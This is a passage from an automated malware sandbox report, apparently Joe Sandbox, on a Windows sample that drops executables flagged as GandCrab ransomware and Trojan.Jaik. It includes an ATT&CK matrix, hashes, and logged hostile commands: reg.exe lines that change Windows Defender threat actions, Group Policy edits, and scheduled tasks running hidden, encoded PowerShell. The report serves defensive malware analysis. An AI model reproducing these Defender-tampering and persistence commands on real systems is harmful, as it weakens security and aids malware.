Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeCode function: 2_2_01484B37 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414B04 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Modifies Group Policy settings
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeFile written: C:\Windows\System32\GroupPolicy\gpt.iniJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation		11
Scheduled Task/Job		11
Process Injection		2
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts21
Command and Scripting Interpreter		Boot or Logon Initialization Scripts11
Scheduled Task/Job		1
Disable or Modify Tools		LSASS Memory121
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts11
Scheduled Task/Job		Logon Script (Windows)Logon Script (Windows)1
Modify Registry		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts1
Native API		Logon Script (Mac)Logon Script (Mac)41
Virtualization/Sandbox Evasion		NTDS41
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud Accounts2
PowerShell		Network Logon ScriptNetwork Logon Script11
Process Injection		LSA Secrets1
Application Window Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common11
Deobfuscate/Decode Files or Information		Cached Domain Credentials4
File and Directory Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items2
Obfuscated Files or Information		DCSync24
System Information Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
File Deletion		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 715145 Sample: file.exe Startdate: 03/10/2022 Architecture: WINDOWS Score: 80 89 Multi AV Scanner detection for dropped file 2->89 91 Sigma detected: Schedule system process 2->91 93 Suspicious powershell command line found 2->93 95 Encrypted powershell cmdline option found 2->95 10 file.exe 7 2->10         started        13 fdKxpPd.exe 8 2->13         started        16 powershell.exe 12 2->16         started        18 gpscript.exe 2->18         started        process3 file4 81 C:\Users\user\AppData\Local\...\Install.exe, PE32 10->81 dropped 20 Install.exe 4 10->20         started        83 C:\Windows\Temp\...\avEZCOa.exe, PE32 13->83 dropped 103 Multi AV Scanner detection for dropped file 13->103 105 Very long command line found 13->105 107 Uses cmd line tools excessively to alter registry or file data 13->107 24 powershell.exe 9 13->24         started        26 gpupdate.exe 1 16->26         started        28 conhost.exe 16->28         started        signatures5 process6 file7 79 C:\Users\user\AppData\Local\...\Install.exe, PE32 20->79 dropped 97 Multi AV Scanner detection for dropped file 20->97 30 Install.exe 10 20->30         started        99 Uses cmd line tools excessively to alter registry or file data 24->99 34 cmd.exe 24->34         started        36 conhost.exe 24->36         started        38 reg.exe 24->38         started        42 18 other processes 24->42 40 conhost.exe 26->40         started        signatures8 process9 file10 85 C:\Users\user\AppData\Local\...\fdKxpPd.exe, PE32 30->85 dropped 87 C:\Windows\System32behaviorgraphroupPolicy\gpt.ini, ASCII 30->87 dropped 109 Multi AV Scanner detection for dropped file 30->109 111 Uses schtasks.exe or at.exe to add and modify task schedules 30->111 113 Modifies Group Policy settings 30->113 44 forfiles.exe 1 30->44         started        46 forfiles.exe 1 30->46         started        48 schtasks.exe 2 30->48         started        52 3 other processes 30->52 115 Uses cmd line tools excessively to alter registry or file data 34->115 50 reg.exe 34->50         started        signatures11 process12 process13 54 cmd.exe 1 44->54         started        57 conhost.exe 44->57         started        59 cmd.exe 1 46->59         started        61 conhost.exe 46->61         started        63 conhost.exe 48->63         started        65 conhost.exe 52->65         started        67 conhost.exe 52->67         started        69 conhost.exe 52->69         started        signatures14 101 Uses cmd line tools excessively to alter registry or file data 54->101 71 reg.exe 1 1 54->71         started        73 reg.exe 1 54->73         started        75 reg.exe 1 1 59->75         started        77 reg.exe 1 59->77         started        process15

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exe46%ReversingLabsWin32.Trojan.Jaik
C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exe73%ReversingLabsWin32.Ransomware.GandCrab
C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exe0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe73%ReversingLabsWin32.Ransomware.GandCrab
C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe0%MetadefenderBrowse
C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\avEZCOa.exe73%ReversingLabsWin32.Ransomware.GandCrab
C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\avEZCOa.exe0%MetadefenderBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crl.m0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000011.00000002.481039344.0000020542CFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.485427050.0000020542E32000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    http://crl.mpowershell.exe, 00000011.00000002.501145246.000002054ACF0000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.391402667.0000020532E93000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000011.00000002.386721858.0000020532C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.469816880.0000000003A91000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.391402667.0000020532E93000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.391402667.0000020532E93000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://contoso.com/powershell.exe, 00000011.00000002.485427050.0000020542E32000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://nuget.org/nuget.exepowershell.exe, 00000011.00000002.481039344.0000020542CFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.485427050.0000020542E32000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://contoso.com/Licensepowershell.exe, 00000011.00000002.485427050.0000020542E32000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 00000011.00000002.485427050.0000020542E32000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown

            World Map of Contacted IPs

            No contacted IP infos

            General Information

            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:715145
            Start date and time:2022-10-03 17:12:31 +02:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 11m 18s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:file.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:59
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal80.evad.winEXE@97/15@0/0
            EGA Information:
            • Successful, ratio: 25%
            HDC Information:
            • Successful, ratio: 100% (good quality ratio 97.8%)
            • Quality average: 84.8%
            • Quality standard deviation: 22.7%
            HCA Information:Failed
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): clients2.googleusercontent.com, files.testupdate.info, clients2.google.com, login.live.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, api.testrequest.info, www.googleapis.com, www.testupdate.info, service-domain.xyz
            • Execution Graph export aborted for target Install.exe, PID 5796 because there are no executed function
            • Execution Graph export aborted for target fdKxpPd.exe, PID 5880 because there are no executed function
            • Execution Graph export aborted for target powershell.exe, PID 4744 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            17:13:39Task SchedulerRun new task: gUpzuvmWb path: powershell s>-WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
            17:13:39API Interceptor1x Sleep call for process: Install.exe modified
            17:13:46Task SchedulerRun new task: bGZpGlqvDNKjraWjlZ path: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe s>d8 /site_id 525403 /S
            17:13:54API Interceptor33x Sleep call for process: powershell.exe modified
            17:15:01API Interceptor1x Sleep call for process: fdKxpPd.exe modified
            17:15:05Task SchedulerRun new task: HqggdVJZxuzvaULcA path: C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\avEZCOa.exe s>Av /site_id 525403 /S
            17:15:09Task SchedulerRun new task: AzbKTkTFnqewi2 path: C:\Windows\system32\wscript.exe s>"C:\ProgramData\CEEEIGvNcEpIBnVB\PMZagFS.wsf"

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            No context

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):1108
            Entropy (8bit):5.295294468448967
            Encrypted:false
            SSDEEP:24:3AkPpQrLAo4KAxX5qRPD42HZSCvKDe9tOBPnKEU:DPerB4nqRL/HZSCv4e9tOBfzU
            MD5:1C80F1303DD3DDBE3C096705FF52040A
            SHA1:3741403D56389B4EC7CF855E6C76C6DC2C95FF64
            SHA-256:42D4B9FA1F3F8EB161A0C58AADA51D2A417CC8B5CCDA334905C62ACC84493F88
            SHA-512:DC82F25447F671E173D1A7C4D00EAD4C3B1E040D913C7011F3D8A785625D1E26C5982DB8550A63947E996AAF104763C170E070C8BB176ED5EE17115D9DB3AB6C
            Malicious:false
            Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.P...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins

            C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exe

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):6549032
            Entropy (8bit):7.996007339533657
            Encrypted:true
            SSDEEP:196608:91OnR1hEX+tZHCeOenAjtU5p5TXQCH8glK0IAP:3OfhEX+t1QAAZWXpHNT
            MD5:3ADC95B09B9644E908114624326E8D0B
            SHA1:F633820375385B744E331CDC2B9AE5953BA454F7
            SHA-256:CEEB6E796693A8A14FB25E74DC9CD413FDBC7CFE9A973AAE194782BBA7E5B508
            SHA-512:3B0C531CEF0D521E166A3CD79992D3B7805E34BF803ACA33AED82D3E9155280D30640BCCD007305014270BD53D02F78EA0BF152846721F03B90156B5D80B56AA
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 46%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\7zS3361.tmp\__data__\config.txt

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):916429
            Entropy (8bit):7.999819811223583
            Encrypted:true
            SSDEEP:24576:cTPQe27Ew2SvGIEPJL5sZtRCFSkayv5pCvGL:cT3Lw2cGLvse5pCvGL
            MD5:9BA70879AF74936EC008D5FA0D5B20E5
            SHA1:494FD5E4A50513181ECF6F7D3ED0D88D0B5953FB
            SHA-256:57939DC0842C6BAA5EC304E0B63B4D7D4F7749D700EE10C3F95E7F8AF6DF531C
            SHA-512:A72C1B50F21D7F00B7E907B00A468A8981C6F316A955A3B371E944E40C154541FE8077939CEC73610324D35D93B7B0A08818817E100873BF3C52DEBAA9BE9B05
            Malicious:false
            Preview:..}..*.E.\.....)g"..y.....7-...!...g....z.p.....L....E.$.A6...!b?u.{,.r.o.y..f\...S.C.vZ........:.[NPw......_.a.{'..............?V7)8.9.f..O...v_.#....H.6.....k....R.r...q.?...2x!......u...Nf..Y:.uw...]U..dB^.X.9.^q..#E...F.......DJ..s|)1.. .G.+..liC|.V.................q....W.O...W<....=.r..J.....O....W..@.?.x-B...L~}w....3.bH....I.W[....<..2..[..x.H..&....Z.Ezc...S..h,.....&.^.E.p........u:... ..F.u,...L..7..f.@..uQ.b8=r@...P*L.@..W;...;A.P....df...Z%.......i......l.. ..H...z.";.".....M.e....8P.I/G..vK..c...9P6.p..Q.-.2FY8.c.....r...w|..F.Y.......*......:.Ic...*B`X......q.R'..]U0..?.sv|.x./..vx......w,.MN...<...9.M+.O.Yn.#a .o...N.N..N{...MD=zx....7i..`.O.@.W^.s.F....I. GA3&.....=....}.g..v.~B...m.w.F......t.A.^G....z.|2..S........"..."...{.s]..K+......h..kB.)e..c.../...z...v..J.....&.W...".6d$....[.".}l.S>o,.@.g........V....v.HM.J.tCDl,.0.l...3TNL......WR......W........z.3.M..s=.I.jR=.......A...pA.'t.{\[..t...am?m2..(...]....=6!$T.l..oDz.|

            C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exe

            Download File
            Process:C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):7079936
            Entropy (8bit):7.686915853000789
            Encrypted:false
            SSDEEP:98304:/s4AALTAk7Sxr3bbSarM172zp7TTJcOfYwTu31QPLM36QVvJMDTRn4QyIlMHLXrC:/s4r7SRS2N7+Of9u31QPQqQVBMHkeMx
            MD5:6F52A47480DAE7C97A64DD5AEBB8E426
            SHA1:204FE492E1CDEACEA89A4F3B2CF41626053BC992
            SHA-256:A506223F4CA78C5C90CA3E02D00A1FEF0E74B7050712C2A5E7EBAA160FA6C879
            SHA-512:994468252493276E3F3EBDE2F03153D16F862CE3277F234785116394F570BEC1E9BD7E49E40321957B7289F6BDB85A06871BBB162A552285C0B812A54FE5D78C
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 73%
            • Antivirus: Metadefender, Detection: 0%, Browse
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P...._..P....a..P....`..P....K..P...P...Q..c.e..P....[..P..c.^..P..Rich.P..................PE..L...*.].................L...R...............`....@..................................6l...@..................................C..x....`..N........................J...................................ek.@............@...............................text....K.......L.................. ..`.data........`...:\..P..............@....idata..>....@........k.............@..@.rsrc...N....`........k.............@..@.reloc...J.......L....k.............@..B................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe

            Download File
            Process:C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):7079936
            Entropy (8bit):7.686915853000789
            Encrypted:false
            SSDEEP:98304:/s4AALTAk7Sxr3bbSarM172zp7TTJcOfYwTu31QPLM36QVvJMDTRn4QyIlMHLXrC:/s4r7SRS2N7+Of9u31QPQqQVBMHkeMx
            MD5:6F52A47480DAE7C97A64DD5AEBB8E426
            SHA1:204FE492E1CDEACEA89A4F3B2CF41626053BC992
            SHA-256:A506223F4CA78C5C90CA3E02D00A1FEF0E74B7050712C2A5E7EBAA160FA6C879
            SHA-512:994468252493276E3F3EBDE2F03153D16F862CE3277F234785116394F570BEC1E9BD7E49E40321957B7289F6BDB85A06871BBB162A552285C0B812A54FE5D78C
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 73%
            • Antivirus: Metadefender, Detection: 0%, Browse
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P...._..P....a..P....`..P....K..P...P...Q..c.e..P....[..P..c.^..P..Rich.P..................PE..L...*.].................L...R...............`....@..................................6l...@..................................C..x....`..N........................J...................................ek.@............@...............................text....K.......L.................. ..`.data........`...:\..P..............@....idata..>....@........k.............@..@.rsrc...N....`........k.............@..@.reloc...J.......L....k.............@..B................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngtmqmma.n4d.ps1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oq22ozvi.ndj.psm1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1

            C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):12144
            Entropy (8bit):5.377046628185695
            Encrypted:false
            SSDEEP:192:VtH+avFCfHjdIq5CV98Jcdv2DAsb+EBOYSVFEJ+aNK1e+9kN8ro:VteMEGkCL8WZ0915SVS2ro
            MD5:5786E98AE7308DA07A287F0A3605337D
            SHA1:575521622C1024BDC53DE7B3DC83BF082B7EC13F
            SHA-256:81AE0CF674B30B60C80F8DB8FE0ADD03BB2792CD722E542D3404FFCDE2991D8E
            SHA-512:AC84B67C7AAD603DFCB8647EF5C6233C28FFC81F61917F7A961818F7403CE8C85A998062C67A31C25BC0F6378C68F4BC506E19CA2AA1E1731DFCD70E3171A4B2
            Malicious:false
            Preview:@...e...........................................................H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.Configuration............................................T.@..>@...@.V.@.H.@.X.@.[.@.NT@.HT@..S@..S@.hT@..S@..S@..S@.\.@..T@..T@.@X@.?X@..T@..S@..S@..T@..T@.

            C:\Windows\System32\GroupPolicy\Machine\Registry.pol

            Download File
